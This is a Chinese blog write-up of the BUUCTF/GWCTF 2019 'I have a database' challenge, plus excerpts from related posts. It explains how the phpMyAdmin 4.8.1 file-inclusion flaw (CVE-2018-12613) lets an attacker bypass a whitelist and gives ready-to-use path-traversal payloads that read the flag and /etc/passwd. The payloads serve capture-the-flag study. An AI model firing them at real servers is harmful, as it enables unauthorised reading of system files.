buuctf 我有一个数据库

最新推荐文章于 2022-09-20 23:45:23 发布
最新推荐文章于 2022-09-20 23:45:23 发布
阅读量310 收藏
点赞数
文章标签: mysql php 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ANYOUZHEN/article/details/125111045
版权

打开题目,出现了一堆乱码

也没啥可以传参的,开个dirsearch扫扫看看

扫描目录发现/phpmyadmin

发现其版本为phpmyadmin4.18,搜索相关版本的漏洞。

 

phpMyAdmin是一套开源的、基于Web的[MySQL](https://so.csdn.net/so/search?q=MySQL&spm=1001.2101.3001.7020)数据库管理工具。其index.php中存在一处文件包含逻辑,  

远程文件包含漏洞:服务器通过php的特性(函数)去包含任意文件时,由于要包含的这个文件来源过滤不严,从而可以去包含一个恶意文件,而我们可以构造这个恶意文件来达到恶意目的

/etc/passwd被读取,说明文件包含漏洞存在

/phpmyadmin/?target=db_sql.php%253f/../../../../../../../../flag

得到flag

问题出在

public static $goto_whitelist = array(
        'db_datadict.php',
        'db_sql.php',
        'db_events.php',
        'db_export.php',
        'db_importdocsql.php',
        'db_multi_table_query.php',
        'db_structure.php',
        'db_import.php',
        'db_operations.php',
        'db_search.php',
        'db_routines.php',
        'export.php',
        'import.php',
        'index.php',
        'pdf_pages.php',
        'pdf_schema.php',
        'server_binlog.php',
        'server_collations.php',
        'server_databases.php',
        'server_engines.php',
        'server_export.php',
        'server_import.php',
        'server_privileges.php',
        'server_sql.php',
        'server_status.php',
        'server_status_advisor.php',
        'server_status_monitor.php',
        'server_status_queries.php',
        'server_status_variables.php',
        'server_variables.php',
        'sql.php',
        'tbl_addfield.php',
        'tbl_change.php',
        'tbl_create.php',
        'tbl_import.php',
        'tbl_indexes.php',
        'tbl_sql.php',
        'tbl_export.php',
        'tbl_operations.php',
        'tbl_structure.php',
        'tbl_relation.php',
        'tbl_replace.php',
        'tbl_row_action.php',
        'tbl_select.php',
        'tbl_zoom_select.php',
        'transformation_overview.php',
        'transformation_wrapper.php',
        'user_password.php',
    );

之后phpadmin的开发团队考虑到了target后面加参数的情况,通过字符串分割将问号的前面部分取出,继续匹配白名单,然后经过一遍urldecode后再重复动作。
所以这里我们可以选取白名单里的任意一个页面。

绕过所有的检查。
最后在include包含文件时,斜杠前面的部分包括问号会被当作文件名。
ps:如果是linux系统下,就更简单了,直接通过问号截断就行了。

ANYOUZHEN
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BUU刷题--[GWCTF 2019]我有一个数据库
weixin_48631429的博客
12-02 553
我有一个数据库 打开看到这样一堆文字,读不懂,也没有其他的信息。 怎么想也想不到该怎么做,buu还不能扫描。所以只能看了wp,看到有一个/phpmyadmin,回来开始想怎么做 phpmyadmin版本信息4.8.1,搜索一下有什么漏洞。 任意文件包含:那么我们就可以利用来读flag ?target=db_datadict.php%253f/../../../../../../../../../flag 拿到flag 考点就是CVE-2018-12613 ...
BUUCTF- 我有一个数据库
qq_45393916的博客
03-03 3894
BUUCTF--我有一个数据库(靶场思路)
buuctf-[[GWCTF 2019]我有一个数据库(小宇特详解)
小宇的web博客
02-12 594
buuctf-[[GWCTF 2019]我有一个数据库(小宇特详解) 这里不知道什么原因显示的乱码 直接使用dirsearch对网站进行扫描吧 这里扫到了phpmyadmin目录,无密码直接登录成功。 这里给出了版本号MySQL数据库Version 4.8.1。 这个版本有文件包含漏洞 漏洞原理是 利用/使db_datadict.php?成为一个不存在目录,利用include函数的目录不断跳转尝试得到flag目录。 payload phpmyadmin/index.php?target=db_datadi
BUUCTF WEB [GWCTF 2019]我有一个数据库
Y1da的博客
04-27 371
BUUCTF WEB [GWCTF 2019]我有一个数据库 刷新后查看响应包 <!DOCTYPE html> <html> <head> <title>空的数据库</title> </head> <body> <h1>我有一个数据库,但里面什么也没有~</h1> <h1>不信你找</h1> </body> </html> 没有什么其他
BUUCTF Web [GWCTF 2019]我有一个数据库1 & [BJDCTF2020]Mark loves cat1
网安小趴菜
09-20 615
BUUCTF Web [GWCTF 2019]我有一个数据库1 & [BJDCTF2020]Mark loves cat1
BUUCTF逆向前八题
01-24
逆向工程是网络安全和软件开发领域中的一个重要技能,主要用于理解二进制程序的内部工作原理。在本篇中,我们将探讨在BUUCTF储备赛中遇到的前八道逆向题目,通过这些题目来学习如何使用逆向工具,如exeinfo和IDA,...
BasicASM.s(BUUCTF
06-04
分析过程文件
BUUCTF题目(含工具),你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分
04-09
BUUCTF题目(含工具),你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分
BUUCTF】MISC zip
01-20
import zipfile import string import binascii def CrackCrc(crc): for i in dic: for j in dic: for p in dic: for q in dic: s = i + j + p + q if crc == (binascii.crc32(s.encode())): ...
BUUCTF部分web题目
最新发布
05-06
写题记录
phpmyadminV4.8.1本地文件包含漏洞复现
seek_2022的博客
07-05 2787
出于学习和技术分享的目的,本文针对phpMyadmin-v4.8.1存在的文件包含漏洞,通过代码审计结合本地搭建测试环境的方式进行漏洞复现研究,以供大家参考学习。
BUU [GWCTF 2019]我有一个数据库
cadandme的博客
05-11 206
刷了一道web题,记录做题过程。 打开页面看到 打开源码,尝试解码。试了UTF-8,尝试把得到的数据导成文档。 结果是乱码,走入了死胡同。数据库数据库,又想到扫描目录,在kali扫描,发现东西 先看txt, 再看phpinfo.php 到这里彻底不懂了,瞎搞了没看出东西后,看了大佬的wp,说是phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613) 后面跟着wp来,可惜在构造Pyaload使用时显示 index.php?target=db_sql.php%253f/
BUUCTF刷题记录(3)
bmth666的博客
03-20 3298
web [SWPU2019]Web1 [ASIS 2019]Unicorn shop [ACTF2020 新生赛]Include [安洵杯 2019]easy_web [WesternCTF2018]shrine [ACTF2020 新生赛]Exec [GXYCTF2019]禁止套娃 方法一:array_flip()和array_rand() 方法二:array_reverse() 方法三:使用session [GXYCTF2019]BabySQli [CISCN 2019 初赛]Love Math
buuctf [SWPU2019]Web1 记录
SopRomeo的博客
03-14 1339
注册进去发现可以发广告,看到这我马上试了试有没有xss漏洞 可以发现是存在的。emmmm,我用beef上传那个js代码不行。。可能是我太菜了我觉得这道题应该能用xss漏洞做出来。 百度了web 发现广告栏存在sql注入… 学到了,留言板也是放在数据库里的,可能是最近接触xss的缘故没想到吧…太菜了我。 我找到的writeup写的太简略了,我这个菜鸡就写的详细点吧… 在title进行常规sql判...
[GWCTF 2019]我有一个数据库&CVE-2018-12613
qq_43801002的博客
04-27 749
#两道题用的都是]CVE-2018-12613这一个洞,所以就给写一起了。 1.审下源码吧 问题在index.php的55~63: // If we have a valid target, let's load that script instead if (! empty($_REQUEST['target']) && is_string($_REQUEST['targ...
[GWCTF 2019]我有一个数据库 1
qq_43618536的博客
07-21 668
[GWCTF 2019]我有一个数据库 1
[GWCTF 2019]我有一个数据库
夜幕下的灯火阑珊的博客
05-14 1414
知识点 phpmyadmin任意文件读取 dirb扫描到后台有phpmyadmin目录,访问一下 版本为4.81,经查询,存在远程文件读取漏洞 直接上payload读取passwd文件 /phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd 读取成功,尝试读...
[GWCTF 2019] web题-我有一个数据库
BROTHERYY的博客
07-30 1767
复现环境:buuoj.cn 我是从题目猜到有phpmyadmin,直接就输入就进去了 看一下版本信息 phpmyadmin4.8.0-4.8.1存在文件包含漏洞 使用网上的payload直接打 ?target=db_datadict.php%253f/../../../../../../../../etc/passwd 能够执行,修改为flag flag{15aa1a13-8298-433c-8139-4ff6a0ffb5d6} ...
buuctf misc 另外一个世界
03-16
buuctf misc 另外一个世界是指在计算机安全比赛中,misc类型的题目通常是指一些杂项的题目,它们可能与其他类型的题目不太相似,需要参赛者拥有广泛的知识和技能才能解决。而另外一个世界指的是这道题目的思路和解决...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值